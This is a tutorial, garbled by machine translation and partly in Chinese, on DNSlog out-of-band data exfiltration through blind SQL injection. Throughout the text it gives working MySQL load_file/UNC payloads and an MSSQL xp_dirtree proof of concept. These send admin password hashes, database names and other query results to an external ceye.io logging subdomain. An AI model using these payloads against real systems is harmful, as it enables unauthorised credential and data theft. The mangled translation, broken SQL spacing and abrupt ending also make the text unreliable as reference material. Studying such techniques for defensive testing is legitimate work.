DNSlog produce injection
Some test site, some implantation is no echo can be blind by writing a script, but some sites will ban out our ip, ip can be solved by setting agent pool, but the blinds are often inefficient, so had DNSlog injection.
DNSlog injection scenario
sql injection blinds, no significant return command execution , no echo of SSRF
DNSlog injection principle
You can configure a domain name (for example: ceye.io), then for their own domain name server settings A through agents (ceye.io) of nameserver, then the A server configured DNS Server, and so since all ceye.io subdomain thereof will query to the server a, this time it is possible to monitor the real-time domain required, as shown below:
注入语句:http://127.0.0.1/mysql.php?id=1 union select 1,2,load_file(CONCAT('\\',(SELECT hex(pass) FROM test.test_user WHERE name='admin' LIMIT 1),'.mysql.nk40ci.ceye.io\abc'))
1) '. Mysql.nk40ci.ceye.io \ abc'))
UNC path dnslog can only be used in the windows
\\abc.mysql.nk40ci.ceye.io\abc
load_file function in Linux is unable to do dnslog attacks because here it comes to a small Tips for Windows - UNC path.
2) UNC path
UNC path of Baidu's explanation: . UNC is a naming convention, mainly used to specify and map network drives on Microsoft Windows UNC naming convention is used in most LAN access the file server or printer, common network to share files is this the way.
In fact, we usually used to share files in Widnows will be used when this form of network address: \\ sss.xxx \ test \
CONCAT () function stitching four \, and by escaping, 4 becomes \ became 2 \, is the use of a UNC path.
tips: Linux does not have a UNC path, so when in the Linux system is MySQL, when using this method can not be packed data
mssql
Common POC as follows:
SELECT @host=(SELECT TOP 1master.dbo.fn_varbintohexstr(password_hash)FROM sys.sql_loginsWHERE name='sa')+'.ip.port.b182oj.ceye.io';
EXEC('master..xp_dirtree"\'+@host+'\foobar$"');In the Database Console can indeed get Hash database after sa user Hex code. But the actual data to get our test_user the table when the POC to take some processing.
First, sqlserver the field name is not defined, and the function name from the conflict , the conflict if needed [] field will wrap, as shown below:
just the user user field, and the system () function with the same name, the field requires [] parcels
DNS will leave when parsing log, read multi-level domain name (domain name can be obtained by splicing) parsing log for information
http://ceye.io This is a free record dnslog platform, we will give you the control panel to register a second-level domain: xxx.ceye.io, when we inject information into third-level domains, where the background the log will be recorded
Example: sql blind
DNSlog blinds load_file () function needs to use, it is generally have to be root privileges . show variables like '% secure%' ; see the load_file () disk can be read.
When secure_file_priv is null, load_file can not load the file;
When secure_file_priv to G: \, G can read the disk file;
当secure_file_priv为空,就可以读取磁盘的目录。
通过设置my.ini文件中的secure_file_priv="",就可以load_flie任意磁盘的文件
在mysql命令行执行:select load_file('\\\\afanti.xxxx.ceye.io\\aaa');其中afanti就是要注入的查询语句
查看平台dnsLog被记录下来
load_file()函数可以通过dns解析请求。目标主机是联网的windows系统,可读取编译文件
执行的sql语句:SELECT * FROM users WHERE id='1' and if((select load_file(concat('\\\\',(select database()),'.xxxxx.ceye.io\\abc'))),1,0)
查看dnslog日志,发现security数据库被查询出来:
Payload: 为了解决sleep时间过长问题,数据外带,标记部分表示域名
